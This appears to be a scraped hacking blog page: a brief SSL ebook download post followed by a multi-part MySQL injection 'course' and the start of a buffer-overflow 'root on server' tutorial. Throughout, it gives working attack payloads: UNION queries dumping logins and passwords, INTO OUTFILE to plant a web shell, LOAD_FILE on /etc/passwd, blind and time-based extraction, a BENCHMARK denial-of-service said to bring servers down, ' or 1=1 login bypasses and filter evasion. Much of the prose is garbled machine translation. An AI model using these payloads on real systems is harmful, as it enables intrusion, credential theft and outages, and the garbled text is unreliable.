[ ebook ] Beginner Guide to SSL Certificates by Symantec

Here is a Beginner Guide to SSL Certificates from Symantec. as we all know that how much we are using the security encryption so we think that you should also learn about this download this from the below link and here are the contents in this PDF following things are explained :

• Introduction
• What is an SSL Certificate?
• How Does SSL Encryption Work?
• How Do I Know That a Site Has a Valid SSL Certificate?
• Where Would I Use an SSL Certificate?
• Different Types of SSL Certificate
• Tech Talk Made simple
• Conclusion

Download :

[Download]

Placed in Google drive if any problem occurred just let me know in comments and i will increase the number of download links ..

MySQL injection Experts guide

Assalam-0-Alaikum,

if you want to learn from the beginning you must watch my complete series from the beginning,

i am completing my Series on My SQL injection:

1. Lesson 1 And 2 Intro and type of Vulnerabilities
2. Lesson 3 Learning about My SQL
3. Lesson 4 Expert Learning About MySQL

************************************786**************************************

In the previous article of Learning about MySQL.

Description of columns / tables if you can not access INFORMATION_SCHEMA

This zhopny option. Here comes into force on a regular brutofors ... Example:

_http: / / xxx / news.php? id =- 1 'UNION SELECT 1,2,3,4,5,6 FROM tbl_name --

Should choose tbl_name until not lost error message like:
mysql_query (): Table 'tbl_name' doesn't exist
Well, we have introduced to her happiness Users missing error message, and the page displays as if

_http: / / xxx / news.php? Id =- 1 'UNION SELECT 1,2,3,4,5,6 -

It means something that There's a table Users, and to proceed to the sorting columns.

_http: / / xxx / news.php? id =- 1 'UNION SELECT 1,2,3, column_name, 5,6 FROM Users --

Should choose col_name until not lost error message like:
mysql_query (): Unknown column 'col_name''in' field list '
Where is lost error message means such column exists.
And so we learned that the Users table has columns login, password.



Listing Information....Appeal to the script so _http: / / xxx / news.php? Id =- 1 'UNION SELECT 1,2, login, password, 5,6 FROM Users LIMIT 1,1 - Displays us login and password the first nick in the table Users.



There is a MYSQL such an interesting feature like SELECT ... INTO OUTFILE allows you to record information in the file. Alternatively, such a construction SELECT ... INTO DUMPFILE they almost seem, and you can use any.
example:

_http: / / xxx / news.php? Id =- 1 'UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1. Txt'; --

prevented us to make the web going? That's like this:

_http: / / xxx / news.php? id =- 1 'UNION SELECT 1,2,3,' ', 5,6 INTO OUTFILE '1. php '--

It remains only to find the full path to the root of the site on a server and add it to 1.php. Vriprintsipe found another mistake on the report which will be visible path on the server or leave the root server and pick up its local inkludom, but that is another topic.



Reading files

Consider the function LOAD_FILE

_http: / / xxx / news.php? Id =- 1 'UNION SELECT 1,2, LOAD_FILE (' etc / passwd '), 4,5,6;

For here, there are also several limitations.
Must be a full path to the file.
Wanted privileges such as FILE
File should be located on the same server
The size of the file must be less than specified in the max_allowed_packet
The file should be opened for reading from the Members area under which is running MYSQL

and If the function fails to read the file it returns NULL.

**************

In most cases, SQL Server dosyat due to the fact that nothing else they can do. Type failed to learn tables / columns, no rights to it, no rights to it, etc. I honestly against this method but still ...
Get to the point ... www.H4ck3rCracks.com
BENCHMARK function performs the same action several times.

SELECT BENCHMARK (100000, md5 (current_time));

So here this function 100000 times makes md5 (current_time) that I have on comp takes about 0.7 seconds ... It seems that there is such ... And if you try the attached BENCHMARK?

SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (current_time)));

Example Dos in our case:

_http: / / xxx / news.php? id =- 1 'UNION SELECT 1, 2, BENCHMARK (100000, BENCHMARK (100000, md5 (current_time))), 4, 5, 6 --

Suffice it 100 times poked F5 and the server goes down in unrestrained Down

**********

Character bust

This case we need if _http: / / xxx / news.php? Id = 1, with different id will give us different results http://xxx/news.php?id=1 will be different from _http: / / xxx / news.php? Id = 0
if not, then this method is useless but to finish worth.

request to the database

SELECT * FROM news WHERE id = '1 '

Now we will modify a vulnerable paramtr id to such request

SELECT * FROM news WHERE id = '-1' OR id = IF (ASCII ((SELECT USER ()))>= 254, '1 ', '0') - ';

_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII ((SELECT USER ()))>= 254, '1', '0 ') --

To start MYSQL runs the subquery SELECT USER () inserts it into the function ASCII () which returns the ascii code for the first character of the result of the virtual command and the function IF () returns 1 if the code is greater than or equal to 100
general request to become such

SELECT * FROM news WHERE id = '-1' OR id = 1

when accessing the script _http: / / xxx / news.php? id = 1 and if the code of this number is less then the main query is this

SELECT * FROM news WHERE id = '-1' OR id = 0

and performed just as well as in _http: / / xxx / news.php? id = 0 will be called conditionally that the query returns 1 (yes) or 0 (no), respectively, and begin to pick.







_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 100, '1', '0 ')
Again returned 1 means the first character is greater than or equal to 100. We try like this:
_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 200, '1', '0 ')
Returned 0 means 100 <= code _http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 150, '1', '0 ')
Again he returned 0 means 100 <= code _http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 125, '1', '0 ')
And once again returned 0 means 100 <= code _http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 113, '1', '0 ')
Returned 1 sledovatelno113 <= character code <125 data-blogger-escaped-.="." data-blogger-escaped-br="br">_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 118, '1', '0 ')
Returned 0 sledovatelno113 <= character code <118 data-blogger-escaped-.="." data-blogger-escaped-br="br">_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1)> = 115, '1', '0 ')
113 <= code _http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1) = 113, '1', '0 ')
Returned 0 means the character code is not equal to 113.
_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1,1) = 114, '1', '0 ')
Cheers! Returned 1 means the character code is 114. We translate into a symbol and get the symbol "r". Now on to the next character.
_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 2,1)> = 100, '1', '0 ')

And again we repeat all the previous steps.

**************************

What to do if there is no output of the field and off error reporting? We will come to the aid of the function BENCHMARK. As described above, this function performs a single action several times. So what you ask ... And that's what. Recall that the query

SELECT BENCHMARK (100000, BENCHMARK (100000, md5 (NOW ())));

                                                             ^ _^

character at a time to pick any option is valid user name under which we are connected to the database (it takes us to the function USER ()).

_http: / / xxx / news.php? id =- 1 'OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1, 1 )))>= 100, 1, BENCHMARK (2999999, MD5 (NOW ()))) --

Inquiry will be

SELECT * FROM news WHERE id = '-1' OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1, 1 )))>= 100, 1, BENCHMARK (2999999, MD5 (NOW ())) ) - ';

we will to pick the string USER (). Only in this case, instead of 0, the function will be a very long time to fulfill this request and that we will talk about that a request has returned, and 0, respectively, if without any delay, then the query returns 1.

Now let's talk about the time delay. To determine the recovery time of 0 and 1 need to make several preliminary queries:

_http: / / xxx / news.php? id =- 1 'OR id = IF (99> 100, 1, BENCHMARK (2999999, MD5 (NOW ())))

Will return 0. It is necessary to detect the time. Depending on the width of your channel to select the number 2999999 to the extent that you can accurately judge whether or not the delay in comparison with

_http: / / xxx / news.php? id =- 1 'OR id = IF (101> 100, 1, BENCHMARK (2999999, MD5 (NOW ())))

.................return 1

after each execution BENCHMARK-SQL server and need to give some time to rest.



error reporting

This method is based on the fact that instead of returning 0, executed subquery which causes an error and the error output can be judged that the returned 0 and the absence of errors that returns 1. This method will help us if there is no output of the field but including (!) Bug report.

SELECT * FROM news WHERE id = '-1' OR id = (SELECT 1 UNION SELECT 2)

Correct the error as the id is compared with a subquery that returns two rows.
mysql_query (): Subquery returns more than 1 row
This was the theory. Now turn to the query with which we are to pick characters

SELECT * FROM news WHERE id = '-1' OR id = IF (ASCII (SUBSTRING ((SELECT USER ()), 1, 1 )))>= 100, 1, (SELECT 1 UNION SELECT 2)) - ' ;

As seen from this query if the character code is greater than or equal to 100 function IF () returns 1, then the errors and no frequent visitors, and if the function performs a subquery

SELECT 1 UNION SELECT 2

which returns two strings that when compared with the id causes an error and we understand that the query returns 0.
A great disadvantage of this method is that the logs will accumulate huge amounts of errors. A great advantage is speed.



many had the impression that this is a hopeless case...not with xXJoKeRXx. Well, what are we going to change this view to the contrary. Suppose a database query looks like this:

SELECT * FROM news ORDER BY $ by

And as always variable $ by not pass filtering, and the page displays a few lines from the database. What we need to get two requests that would change somehow finding the page, but requests must be such as to be able to influence the outcome of using subqueries say. As such inquiries may be

_http: / / xxx / news.php? by id * 1)
_http: / / xxx / news.php? by id *- 1)

Well Well request for Brutus this nick name will look like this:

_http: / / xxx / news.php? by id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 11 2,1, -1))

Well hatched reverse order News => false

_http: / / xxx / news.php? by id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 11 3,1, -1))

Again lie

_http: / / xxx / news.php? by id * IF (ASCII (SUBSTRING (USER (), 1,1)) = 11 4,1, -1))

About! Direct order News => true
We translate the character code 114 in the symbol r. Proceed to the next character and so on.

*************************

So Now ,

CHTO TO DO IF SOMETHING FILTERS

let us recall that the SQL type of design / ** / is equal to the gap

There is an interesting function CHAR () which returns the code symbol itself simvol.Predpolozhim filtered character ... Well, let him be an asterisk (*). First, we need to know the code for this symbol. In MYSQL is a function ASCII () returns the leftmost character of the string passed to it so yuzaem

SELECT ASCII ('*');

only on a vulnerable host, do not make sense (The symbol '*' filtered) it must be done on the LAN. We learn that the code is 42 and yuzaem function CHAR () so

SELECT CHAR (42, 42, 42);

Outputs three zvezdochki.Esche one way is to use a 16-hexadecimal character code. Now suppose that the filtered light bay 'login'. In MYSQL is a function of HEX () which issues a 16-hexadecimal code line. Yuzaetsya so

SELECT HEX ( 'login');

Will produce '6 C6F67696E 'ahead appends "0x" (To SQL realized he was dealing with a 16-hexadecimal encoding) and obtain '0 x6C6F67696E' is juzat without CHAR () so

SELECT 0x6C6F67696E FROM User;

either the CHAR () so

SELECT CHAR (0x6C, 0x6F, 0x67, 0x69, 0x6E) FROM User;

*******************************************************************************

Now i will explain the new way of sql attacks we will depend on fatal errors or mistakes on web applications .... yeah suck developers  who did not understand fully about sql injection

LOOK....!!!!!!!!

sql injection errors is very important... getting to the site will send you a ridiculous SQL query error message and he  will give us a form.... we reviewed this error message and will try to find some clues from within.... for example, a  site the user to input a user name and password section to
section 'or 1 = 1 - let me say enter...... if the sql vulnerability on the site should give an error as follows:

<!--[ If! SupportLineBreakNewLine] ->
<!--[ Endif] ->

Microsoft OLE DB Provider for ODBC Drivers error '80040e07 ' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'users' to a column of data type int......... / Index.asp, line 11  that's how we got an error..... if this error;

Microsoft Database Drivers error '80040e07 '

sql Server 'users' table did not enter a valid value for matching,...... syntax error has occurred.
/ Index.asp, line 11
Does not end in SQL queries.

'Or 1 = 1 -
"Or 1 = 1 -
'Or' a '=' a
or 1 = 1 -
') Or (' a '=' a
"Or" a "=" as a parameter can also be used.

Above the user name and password section 'or 1 = 1 - to write

because

entry requirement is nothing you or 1 = 1 state get. (1 is always 1 to be equal because every time this command works)

*****************************

POLEZNYE FUNCTIONS IN MYSQL

directory language SQL

USER ()-function displays login nick under which we are connected to MYSQL
DATABASE ()-function displays the name of the database to which we are connected
VERSION ()-displays the version of MYSQL
---------------------------- 

ASCII (str)-returns ASCII code of first character in the string "str"
CHAR (xx1, xx2 ,...)- returns a string consisting of ASCII codes which somvolov xx1, xx2, etc
HEX (str)-returns the hexadecimal equivalent of 16-string "str".
---------------------------- 

LENGTH (str) - Returns the length of the string "str".
SUBSTRING (str, pos [, len])-Returns a substring of length len (if not specified before the end of string "str") characters from string "str", starting from the position pos.
LOCATE (substr, str [, pos])-Returns the position of first occurrence of "substr" to the string "str" starting at position pos (unless it is specified with the beginning of the line "str"). If the substring "substr" in line "str" is missing, it returns 0.
---------------------------- 

LOWER (str)-translates into lower case string "str" (I think only the Latin)
CONCAT (param1, param2 ,...)-association substrings in one line.
CONCAT_WS (sep, param1, param2 ,...)-association substrings in one string delimiter c "sep".
---------------------------- 

IF (exp, ret1, ret2)-Check the condition exp if it is true (not 0) then returns a string ret1 but if not then returns a string ret2.
---------------------------- 

expr BETWEEN min AND max-If the value of expr is greater than or equal to a specified value of min and less than or equal to a specified value max, then the function BETWEEN returns 1, otherwise - 0.
---------------------------- 

AES_DECRYPT (AES_ENCRYPT ( 'string', 'bla'), 'bla') are often Newer bugs summary encoded and can be so strong do not bother using this design.


**************************************************************

Comments in Mysql

# start a comment character in MySQL. Example

SELECT pass, login FROM users # This is comment
SELECT pass, login FROM users

- another version of the commentary in MySQL. Required space after the sign. Example

SELECT pass, login FROM users - This is comment

/ * * / comments similar SI in MySQL. The closing part is optional. For MySQL indeintichna gap. Example

SELECT pass, login FROM users / * This is comment
SELECT pass, login / * This is comment * / FROM users
SELECT / ** / pass, login / ** / FROM / ** / users

/ *! Int * / Expansion of the previous comments. All prisoners in this comment will be interpreted as an SQL query if the number of the MySQL version is equal to the specified number of int after an exclamation point or more. Example

SELECT pass / *! 32302, login * / FROM users

*************************

SQL-Injection: (Fixed in vB 3.0.9)

> / Joinrequests.php:
POST:

> / AdminCP / User.php:
GET:
GET:

> / AdminCP / usertitle.php:
GET:

> / AdminCP / usertools.php:
GET:
o XSS: (Fixed in vB 3.0.9)
=================================================================


> / AdminCP / css.php:
GET:

> / AdminCP / index.php:
GET:

> / AdminCP / User.php:
GET:

> / AdminCP / language.php:
GET:

> / AdminCP / modlog.php:
GET:

> / AdminCP / template.php:
GET:
GET:
GET:

o Arbitrary File Upload:

=================================================================

User with an administrator panel to access (eg (Co) Administrator) and
privilege to add the avatars / icons / smileys is able to upload arbitrary
files. An attacker is able to gain the ability to execute commands under
the context of the web server.
> / AdminCP / image.php:
POST:
POST:
POST:

****************************

Random Registration Getting a table

declare @ sql varchar (500) / * this variable to hold our SQL statement * /
declare @ rowCnt int / * how many records are in the table to keep * /
declare @ top int / * city that will be record holder * /

@ rowCnt = select count (*) from the district / * how many records as we find our table * /
select @ top = cast (rand () * @ rowCnt as int) / * we produced random number * /


/ * Create random log will bring our sql statement * /
set @ sql = 'select top 1 from the district .* tt tt
where not in tt.icKod
(Select top '+ cast (@ top as varchar) +' from ickod district)

exec (@ sql) / * work to order created the same kind sql le yearning and longing, we start to wait for results * /


I have a table

I also use this table structure

CREATE TABLE [dbo]. [District] ( [IcKod] [smallint] NOT NULL, [IcDesc] [varchar] (16) OLLATE NULL Turkish_CI_AS ) ON [PRIMARY]

INSERT INTO district
(IcKod, icDesc)
VALUES
(4, 'BAKIRKÖY');
INSERT INTO district
(IcKod, icDesc)
VALUES
(3, 'BAHÇELİEVLER');
INSERT INTO district
(IcKod, icDesc)
VALUES
(2, 'Bagcilar');
INSERT INTO district
(IcKod, icDesc)
VALUES
(1, 'AVCILAR');
INSERT INTO district
(IcKod, icDesc)
VALUES
(5, 'Bayrampasa');

********************************

Usefull Commands In Sql Injection

Take commands is useful for injection
Abort - abort the current transaction 

ALTER DATABASE - change a database 

ALTER GROUP - add users to a group or remove users from a group 

ALTER TABLE - change the definition of a table 

ALTER TRIGGER - change the definition of a trigger 

ALTER USER - change a database user account 

ANALYZE - collect statistics about a database 

BEGIN - start a transaction block 

CHECKPOINT - force a transaction log checkpoint 

CLOSE - close a cursor 

CLUSTER - cluster a table according to an index 

COMMENT - define or change the comment of an object 

COMMIT - commit the current transaction 

COPY - copy data files and tables Between 

CREATE AGGREGATE - define a new aggregate function 

CREATE CAST - define a user-defined cast 

CREATE CONSTRAINT TRIGGER - define a new constraint trigger 

CREATE CONVERSION - define a user-defined conversion 

CREATE DATABASE - create a new database 

CREATE DOMAIN - define a new domain 

CREATE FUNCTION - define a new function 

CREATE GROUP - define a new user group 

CREATE INDEX - define a new index 

CREATE LANGUAGE - define a new language PROCEDURAL 

CREATE OPERATOR - define a new operator 

CREATE OPERATOR CLASS - define a new operator class for Indexes 

CREATE RULE - define a new rewrite rule 

CREATE SCHEMA - define a new schema 

CREATE SEQUENCE - define a new sequence generator 

CREATE TABLE - define a new table 

CREATE TABLE AS - create a new table from the results of a query 

CREATE TRIGGER - define a new trigger 

CREATE TYPE - define a new data type 

CREATE USER - define a new database user account 

CREATE VIEW - define a new view 

DEALLOCATE - remove a Prepared Query 

DECLARE - define a cursor 

DELETE - delete rows of a table 

DROP AGGREGATE - remove a user-defined aggregate function 

DROP CAST - remove a user-defined cast 

DROP CONVERSION - remove a user-defined conversion 

DROP DATABASE - remove a database 

DROP DOMAIN - remove a user-defined domains 

DROP FUNCTION - remove a user-defined function 

DROP GROUP - remove a user group 

DROP INDEX - remove an index 

DROP LANGUAGE - remove a user-defined language PROCEDURAL 

DROP OPERATOR - remove a user-defined operator 

DROP OPERATOR CLASS - remove a user-defined operator class 

DROP RULE - remove a rewrite rule 

DROP SCHEMA - remove a schema 

DROP SEQUENCE - remove a sequence 

DROP TABLE - remove a table 

DROP TRIGGER - remove a trigger 

DROP TYPE - remove a user-defined data type 

DROP USER - remove a database user account 

DROP VIEW - remove a view 

END - commit the current transaction 

EXECUTE - execute a query Prepared 

EXPLAIN - show the execution plan of a statement 

FETCH - retrieve rows from a table Using a cursor 

GRANT - define access privileges 

INSERT - create new rows in a table 

LISTEN - to the list for a notification 

LOAD - load or reload a shared library file 

LOCK - explicitly lock a table 

MOVE - position a cursor on a row of a table Specified 

NOTIFY - generate a notification 

PREPARE - create a Prepared Query 

Reindex - rebuild corrupted Indexes 

RESET - restore the value of a run-time parameter to a default value 

REVOKE - remove access privileges 

ROLLBACK - abort the current transaction 

SELECT - retrieve rows from a table or view 

SELECT INTO - create a new table from the results of a query 

SET - change a run-time parameter 

SET Constraints - set the constraint mode of the current transaction 

Authorization SESSION SET - set the session user identifier and the current user identifier of the 

current session 

SET TRANSACTION - set the Characteristics of the current transaction 

SHOW - show the value of a run-time parameter 

START TRANSACTION - start a transaction block 

Truncate - empty a table 

UNLISTEN - stop listening for a notification 

UPDATE - update rows of a table 

VACUUM - garbage-collect and optionally analyze a database

END For MySQL 

:P NOw give your feedback i want to see what will be the comments .

********************************

Regards,

Zulqurnain jutt

Learning about MySQL

Assalam-0-Alaikum,

Now Am Going to complete my series for:

1. Lesson 1 And 2 Intro and type of Vulnerabilities
2. Lesson 3 Learning about My SQL
3. Lesson 4 Expert Learning About MySQL

*************************************786***************************************

Definition of output columns

I do think that many of us just such a page as

_http: / / xxx / news.php? Id = 1

is not satisfied with. So we need to do so on the first request there is no output (up to UNION). The easiest way is to change the "id" with a '1 'to' -1 '(or to '9999999')

_http: / / xxx / news.php? id =- 1 'UNION SELECT 1,2,3,4,5,6-

Now we have something where the page should be displayed any of these figures. (For example as it is conventionally script news in the "Name news" you will see say 3, "News" -4 well, etc.). Now that we have some information which we need to replace these figures in obrashenie to the script we need to function. If the numbers do not show up anywhere that the other subparagraphs of paragraph 2.1 will be skipped.

SQL Injection Cross Site Scripting

Example:

_http: / / xxx / news.php? id =- 1 'UNION SELECT 1,2,3,'

Rest Of will be Shown in the next series .


Regards,
Zulqurnain jutt

MySQL injection Full Book

                                 

Assalam-0-Alaikum,

Today we are going to learn about MySQL injection a complete tutorial , well i say a complete book i don't say this tutorial is completely represented to me but i say it is written by me :p

originally was written by attack
*************************************786**************************************

I have make it a series so i could implement it sharply:

1. Lesson 1 And 2 Intro and type of Vulnerabilities
2. Lesson 3 Learning about My SQL
3. Lesson 4 Expert Learning About MySQL

Some information on the Internet in search of at least some of the SQL injection is often a matter of course or if you are not satisfied with anything else, covering, or is that not clear either, must have come across very short or articles. you and me to grasp the subtleties of this gap on the subject of many articles where we've collected 1-20. And then it did not harm others, remembering to say, so I decided to write a FAQ on this issue fully. And once again we ask. Those who will find something you missed in the wrong place, so please otpishites below, all the same it is difficult, all to keep in mind. In the meantime, this is my first post, and please do not throw tomatoes, not kicked.

I will not do a SQL injection is probably not for you then know what is the first day of an article carried by breaking away. The necessary information so that the attacker was a query from the database, then changes to the database where the simple injection SQL injection attack is a type of the original query.

Assimilation is required for this article:

a) The presence of brain :p
b) Direct hands
a) Knowledge of SQL language


Basically, this article is written for PHP MYSQL MSSQL, but there are a few examples.

In fact, the best way but, SQL injection is not reading this article to find out running smoothly as a living like to think that the most precise application, write or use a scenario set out on my end.

Each paragraph was important for the next item, etc., because the meantime, I recommend to read all

Unfortunately, until the paper is divided into several messages does not match the 20,000-character limit.

Still pretty easy. We have all the fields, variables, cookies and should bury a pair of single quotes.


1.1 In the first case

script here

_http: / / xxx / news.php? Id = 1

Suppose the original request to the database as follows:


Note: SELECT * FROM news WHERE id = '1 ';


Quote Now append variable, therefore, such as "id"

_http: / / xxx / news.php? Id = 1 '

variable is not filtered and contains the error messages will appear something like this:

mysql_query (): You have an error in SQL syntax; the right syntax to use near '1''corresponds to your MySQL server version for the manual control

Since an extra query to the database might offer:

SELECT * FROM news WHERE id = '1'';

error reporting is turned off in this case, we would not be confused with such deficits in paragraph 1.4 (also does not prevent it, can determine the presence of. the same as described in

paragraph): _http: / / xxx / news.php? Id = 1 '; -
Will now query the database:

SELECT * FROM news WHERE id = '1 '; -';

(For those who tank "-" a sign of the beginning of all comments after it is thrown, it is still (so is written documentation, since that space must be sure that I would like to draw your attention to the fact that MySQL) and a road in front of him). Thus, for the MySQL query remains the same and looks the same



_http: / / xxx / news.php? Id = 1

Lets See About Some Sql,

SQL is the LIKE operator. This serves to compare the strings. This script is assume such authority when entering a username and password database queries:

Code:

SELECT * FROM users WHERE LIKE 'admin' login and pass LIKE '123 ';

This script even if filters are already quoted, is vulnerable to injection. We are just (the LIKE operator, the symbol "%" matches any string to) "%" instead of a password, and then query the need for

Code:

WHERE LIKE 'admin' AND LIKE '%' SELECT * FROM users pass the entrance;

and input 'admin' was allowed in with. In this case, we not only successfully used in SQL injection is not found.



If the script does not check the authority to offer the same, for?

IMHO at least the kind of information would be foolish to use for the withdrawal of the injection. Let the type of a database query:

Code:

SELECT * FROM users WHERE login = 'admin' AND '= '123 pass;

Unfortunately, the password '123 'is not appropriate, but we found the injection parameter is acceptable,' and this user will be registered under the name of 'administrator login', we need to write, instead of something like this admin '; - part of the authentication password, and we discarded the nickname' Admin 'goes.

'AND pass = '123'; -; WHERE login = 'admin' SELECT * FROM users

Now what to do if the 'pass' to a security vulnerability. We are 123 'OR login =' admin 'on the appropriate area; -. The investigation will be:

Code:

SELECT * FROM users WHERE login = 'admin' AND pass = '123 'OR login =' admin '; -';...

As for the database will be completely inde intechno this query:

Code:

SELECT * FROM users WHERE 'OR (login = admin') (login = 'admin' AND pass = '123) ';

After these steps, we input 'admin' will have the full Acre.

Return to news script. SQL language, numeric parameters, we must remember that the command to put the nail that is at

_http: / / xxx / news.php? Id = 1

request to the database looks like this:

WHERE id = 1 SELECT * FROM news (News);


In addition, the parameter 'id' quotes can be substituted in the same error message, skip this injection detect:


mysql_query (): You have an error in SQL syntax; the right syntax to use near '1''corresponds to your MySQL server version for the manual control


I can see that we offer vyprigivaet this message is not filtered, and then you need to enter


_http: / / xxx / news.php? Bla-bla-bla-ID = 1

DB, for sho blah blah blah does not understand, and displays an error message such as:


mysql_query (): You have an error in SQL syntax; '1 bla-bla-bla 'the right syntax to use near corresponds to your MySQL server version for the manual control


After the check is turned off error reporting on these
ListenRead phonetically

_http: / / xxx / news.php? Id = 1; -

He and look exactly

_http: / / xxx / news.php? Id = 1

Next you will be able to make it difficult for yourself, paragraph 1.1 of the vulnerability described below will be considered a remake not only the type and
To begin with the most useful thing (who knows, Google is not enter) that the team ... UNION
Modify the command treatment

_http: / / xxx / news.php? Id = 1 'UNION SELECT 1 -.

The query from the database are as follows:

Code:

WHERE = '1 'UNION SELECT 1 -' id SELECT * FROM news;

Not like this before and after the number of columns in UNION (table unless there is a news column), forgetting about the truth will come out to meet the specific error:

mysql_query (): different number of columns used in SELECT statements

In this case, we need to get kolichistvo columns (regardless of the number of pre-and post-UNION sootvetsvovalo). to do this way:

_http: / / xxx / news.php? id = 1 'UNION SELECT 1, 2 -

Error. «A different number of columns used in SELECT statements»

_http: / / xxx / news.php? id = 1 'UNION SELECT 1,2,3 -

Error again

_http: / / xxx / news.php? id = 1 'UNION SELECT 1,2,3,4,5,6 -

About! Right on the screen, as well as http://xxx/news.php?id=1
6 pieces of their chosen fields, the average ...

But this method is based on the selection of the number of fields with GROUP BY. This type of request:

_http: / / xxx / news.php? id = 1 'GROUP BY 2 -

The number of these fields are less than or equal to 2 is not displayed.
Making such a request:

_http: / / xxx / news.php? id = 1 'GROUP BY 10 -

Oops ... There was an error mode.

mysql_query (): Unknown column '10 group statement 'in'

Then the column is less than 10 people. Divide by 2 to 10. And a request

_http: / / xxx / news.php? id = 1 'GROUP BY 5 -

Ooops error column number greater than or equal to 5, but that means 10 less. As it turns out 7 is the mean value from 5 to 10 now. Making a request:

_http: / / xxx / news.php? id = 1 'GROUP BY 7 -

another error ...

Another mismysql_query (): Unknown column '7 group statement 'in'

but 7 is less than or equal to the number 5 so. Better get the next request ...

_http: / / xxx / news.php? id = 1 'GROUP BY 6 -

No errors ... but 7 is less than or equal to the number 6, so. These columns are followed by 6 that the required number.

Much for this article rest will be on the next one.

Regards,

Zulqurnain jutt

Get Root on server part 2

Buffer Overflow ( Root on Server 2)

This book is not for beginners so first see my Previous Article of getting root on server part 1

Assalam-0-Alaikum,
-------------------------------------------------786---------------------------------------------------------

I am Going To Complete my Series Of:

1. Rooting on Server Part I
2. Rooting on Server Part II

This Book has C source code, so if you don't know C you can have some problems in this book, you
also need to have some notions on ASM and how to use GDB.
So learn C and comeback later

Chapters

1. Introduction To Buffer Overflow
2. Full tutorial Buffer Overflow (discover & attack)
3. The Metasploit Project

1) Introduction To Buffer Overflow:

                                                                         In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety. Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. They are thus the basis of many software vulnerabilities and can be maliciously exploited. Programming languages commonly associated with buffer overflows include C and C++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not automatically check that data written to an array (the built-in buffer type) is within the boundaries of that array. Bounds checking can prevent buffer overflows.


Source :
“This  is From Wikipedia, the free encyclopedia”


I know that that it's like Chinese For you :p But we will Learn much, so Let's Talk


I know that you have a lot of questions

What is the reason of this Crazy bug?

> it's an Error of programming.(Writing Codes)

Is it important to learn ; it's just small stupid exploit ?

>this type of exploit how make difference between Professional Hackers and Normal
Hackers. I will explain that in Lesson 4 ;) .

Can u give me a Technical description?

A buffer overflow occurs when data written to a buffer, due to insufficient bounds checking, corrupts
data values in memory addresses adjacent to the allocated buffer. Most commonly this occurs when
copying strings of characters from one buffer to another.

Basic example

In the following example, a program has defined two data items which are adjacent in memory: an 8-
byte-long string buffer, A, and a two-byte integer, B. Initially, A contains nothing but zero bytes, and B
contains the number 1979. Characters are one byte wide.

Variable name                       A                      B   
  value                         [null string]            1979  
hex value          00 00 00 00 00 00 00 00    07 BB 



Now, the program attempts to store the null-terminated string "excessive" in the A buffer. By failing to
check the length of the string, it overwrites the value of B:


Variable name                       A                     B   
  value            'e' 'x' 'c' 'e' 's' 's' 'i' 'v'        25856  
hex value        65 78 63 65 73 73 69 76    65 00   





Although the programmer did not intend to change B at all, B's value has now been replaced by a
number formed from part of the character string. In this example, on a big-endian system that uses
ASCII, "e" followed by a zero byte would become the number 25856. If B was the only other variable
data item defined by the program, writing an even longer string that went past the end of B could cause
an error such as a segmentation fault, terminating the process.

• Buffer Overflow exploits.

let's talk about it.
A buffer overflow problem is based in the memory where the program stores it's data.

Why is that?

> you ask. Well because what buffer overflow do is overwrite expecific memory places where should be something you want, that will make the program do something that you want.

Well some of you right now are thinking

"WOW, Finally I know how buffer overflow
works",

but you still don't know how to spot them .

Let's follow a program and try to find and fix the buffer overflow

****************

2) Full tutorial Buffer Overflow (discover & attack)

buffer Overflow Exploits

The thing you should know is that everyone knows how to use them(how do you think that most of the websites that are defaced?), the script kiddies ???


Just go to sites like security focus, Exploit DB or fyodor's exploit
world or Injector …


download it and run it, and then got busted. But why doesn't
everybody write exploits and shell Codes ? Well the problem is that
many people doesn't know how to spot some vulnerability in the
source code, or even if they can they aren't able to write a exploit.
All they Know
just
Perl Exploit blablabla ..


Even my grand mother can do it :P


> So now that you have an idea of what an exploits.


Let's Begin the Work


you must do the experience with me so I advice you to 

Download Code::Blocks to write your code on see results
(Xcode for mac)

------ Partial code below--------
main(int argc, char **argv) {
char *somevar;
char *important;
somevar = (char *)malloc(sizeof(char)*4);
important = (char *)malloc(sizeof(char)*14);
strcpy(important, "command"); /*This one is the important
variable*/
stcrpy(somevar, argv[1]);
..... Code here ....
}
.... Other functions here ....
------- End Of Partial Code -----

> I guess that Everything is Clear


So let's say that important variable stores some system command like, let's say "chmod o-r file" (example) , and since that file is owned by root the program is run under root user too, this means that if you can send commands to it, you can execute ANY system command.(mkdir .. ls -la , cd …) You will play with server like a doll So you start thinking. How the hell can I put something that I want in the important variable. Well the way is to overflow the memory so we can reach it. But let's see variables memory addresses. To do that you need to re-written the code. Check the following code

----------Partial Code------------------
main (int argc, char **argv) {
char *somevar;
char *important;
somevar=(char *)malloc(sizeof(char)*4);
important=(char *)malloc(sizeof(char)*14);
printf("%p\n%p", somevar, important);
exit(0);rest of code here
}
